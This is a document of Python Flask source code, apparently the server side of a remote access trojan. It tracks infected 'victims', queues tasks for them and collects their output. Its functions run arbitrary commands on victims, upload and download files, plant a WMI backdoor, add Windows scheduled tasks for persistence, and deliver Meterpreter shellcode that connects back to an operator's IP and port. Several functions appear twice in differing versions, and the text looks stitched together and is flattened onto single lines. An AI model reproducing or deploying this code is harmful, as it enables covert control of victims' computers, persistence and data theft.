def check(): global server data = unquote(request.get_data()) #TODO: add data format check signature = md5(data + SECRET_KEY) c = victim.victim() p = payload.payload() if not c.get(signature): c = c.add(signature, request.remote_addr) #添加初始任务 action.action().add(signature, signature, 'init', p.init(), 4) #add init task return render_template_string(p.begin(), server=server, signature=signature)
def rat(signature): global server c = victim.victim() a = action.action() p = payload.payload() pattern = r"^[0-9a-f]{32}$" if not re.match(pattern, signature): return "error" if not c.get(signature): return 'error' if request.method == 'GET': cl = c.get(signature) if not cl: return "error" c.heartbeat(signature) ac = a.gettask(signature) if ac: exploit = ac['payload'] pid = ac['pid'] else: exploit = 'aGJlYXQ=' pid = 'aGJlYXQ=' return render_template_string(exploit, server=server, signature=signature, pid=pid) else: pid = request.args.get('pid') pattern = r"^[0-9a-f]{32}$" if not re.match(pattern, pid): return "error" data = request.get_data().encode('base64') a.setfeedback(pid, data) return ''
def getResult(): signature = request.values["signature"] pid = request.values["pid"] a = action.action() data = a.get(pid) if data and data.get("feedback"): return data["feedback"].decode("base64") else: return make_response("error", 500)
def setCmd(): signature = request.form.get("signature").strip() cmd = request.form.get("cmd").strip() a = action.action() p = payload.payload() pid = md5(str(time.time()) + config.SECRET_KEY + signature + cmd + str(random.random())) exploit = p.cmd(cmd) a.add(pid, signature, "[cmd] " + cmd, exploit) return pid
def setUpload(): signature = request.form.get("signature").strip() filePath = request.form.get("filePath").strip() a = action.action() p = payload.payload() pid = md5(str(time.time()) + config.SECRET_KEY + signature + filePath + str(random.random())) exploit = p.upload(filePath) a.add(pid, signature, "[upload] " + filePath, exploit) return pid
def getResult(): signature = request.values['signature'] pid = request.values['pid'] a = action.action() data = a.get(pid) if data and data.get('feedback'): return data['feedback'].decode('base64') else: return make_response('error', 500)
def setWmiBackdoor(): signature = request.form.get('signature').strip() a = action.action() p = payload.payload() pid = md5( str(time.time()) + config.SECRET_KEY + signature + str(random.random())) exploit = p.WmiBackdoor() a.add(pid, signature, '[WmiBackdoor] launched', exploit) return pid
def setExec(): signature = request.form.get('signature').strip() cmd = request.form.get('cmd').strip() a = action.action() p = payload.payload() pid = md5( str(time.time()) + config.SECRET_KEY + signature + cmd + str(random.random())) exploit = p.run(cmd) a.add(pid, signature, '[cmd] ' + cmd, exploit) return pid
def setWindowsTasks(): signature = request.form.get('signature').strip() t = request.form.get('time').strip() a = action.action() p = payload.payload() pid = md5( str(time.time()) + config.SECRET_KEY + signature + t + str(random.random())) exploit = p.WindowsTasks(t) a.add(pid, signature, '[WindowsTasks] ' + t, exploit) return pid
def setUpload(): signature = request.form.get('signature').strip() filePath = request.form.get('filePath').strip() a = action.action() p = payload.payload() pid = md5( str(time.time()) + config.SECRET_KEY + signature + filePath + str(random.random())) exploit = p.upload(filePath) a.add(pid, signature, '[upload] ' + filePath, exploit) return pid
def setDownload(): signature = request.form.get("signature").strip() originalname = request.form.get("filename").strip() savePath = request.form.get("savePath").strip() a = action.action() p = payload.payload() d = download.download() filename = d.getbyname(originalname)["filename"] originalname = d.getbyname(originalname)["originalname"] savePath += "\\" + originalname pid = md5(str(time.time()) + config.SECRET_KEY + signature + originalname + savePath + str(random.random())) exploit = p.download(filename, savePath) a.add(pid, signature, "[download] " + originalname + "(" + filename + ")" + " [savepath] " + savePath, exploit) return pid
def plantMeterpreter0(): signature = request.form.get('signature').strip() ip = request.form.get('ip').strip() port = request.form.get('port').strip() a = action.action() p = payload.payload() s = settings.settings() s.set('LHOST', ip) s.set('LPORT', port) pid = md5( str(time.time()) + config.SECRET_KEY + signature + str(random.random())) exploit = p.MeterpreterShellcode() a.add(pid, signature, '[MeterpreterShellcode] %s:%s' % (ip, port), exploit) return pid
def setDownload(): signature = request.form.get('signature').strip() originalname = request.form.get('filename').strip() savePath = request.form.get('savePath').strip() a = action.action() p = payload.payload() d = download.download() filename = d.getbyname(originalname)['filename'] pid = md5( str(time.time()) + config.SECRET_KEY + signature + originalname + savePath + str(random.random())) exploit = p.download(filename, savePath) a.add( pid, signature, '[download] ' + originalname + '(' + filename + ')' + ' [savepath] ' + savePath, exploit) return pid
def rat(signature): global server c = victim.victim() a = action.action() p = payload.payload() pattern = r"^[0-9a-f]{32}$" if not re.match(pattern, signature): return "error" if not c.get(signature): return 'error' if request.method == 'GET': c = victim.victim() pattern = r"^[0-9a-f]{32}$" if not re.match(pattern, signature): return 'error' if not c.get(signature): return 'error' c.heartbeat(signature) #TODO:添加全局任务 #查找未完成任务 ac = a.gettask(signature) if ac and signature == ac['pid']: a.setfeedback(signature, 'done') exploit = ac['payload'] pid = ac['pid'] elif ac and ac['repeat'] < 3: exploit = ac['payload'] pid = ac['pid'] a.addrepeat(pid) else: exploit = '' pid = 'heartbeat' return render_template_string(exploit, server=server, signature=signature, pid=pid) else: pid = request.args.get('pid') pattern = r"^[0-9a-f]{32}$" if not re.match(pattern, pid): return "error" data = request.get_data().encode('base64') a.setfeedback(pid, data) return ''